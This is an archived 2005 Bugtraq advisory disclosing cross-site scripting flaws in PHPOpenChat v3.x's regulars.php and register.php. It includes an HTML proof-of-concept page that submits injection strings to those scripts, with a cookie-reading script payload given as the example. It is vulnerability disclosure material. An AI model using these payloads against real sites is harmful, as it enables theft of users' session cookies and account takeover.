lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050318072527.16506.qmail@www.securityfocus.com>
Date: 18 Mar 2005 07:25:27 -0000
From: PersianHacker Team <pi3ch@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [PersianHacker.NET 200503-09]PHPOpenChat v3.x XSS Multiple
    Vulnerability




[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability
Date: 2005 March
Bug Number: 09

PHPOpenChat
is a high performance php-based chat server software for a live chat-room or -module on every php-based site.
More info @:
http://phpopenchat.org/


Discussion:
--------------------
The software does not properly validate user-supplied input in 'regulars.php', 'register.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Exploit:
--------------------
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
  <b>XSS in regulars.php:</b><p>
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
  <b>XSS in register.php:</b><p>
  Nikname:
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>
  <p>
  FirstName LastName:
  <input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>
  <p>
  Email:
  <input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>
  <p>
  Url of picture:
  <input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
This vulnerability reported to authors for solution, from bug report webform.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ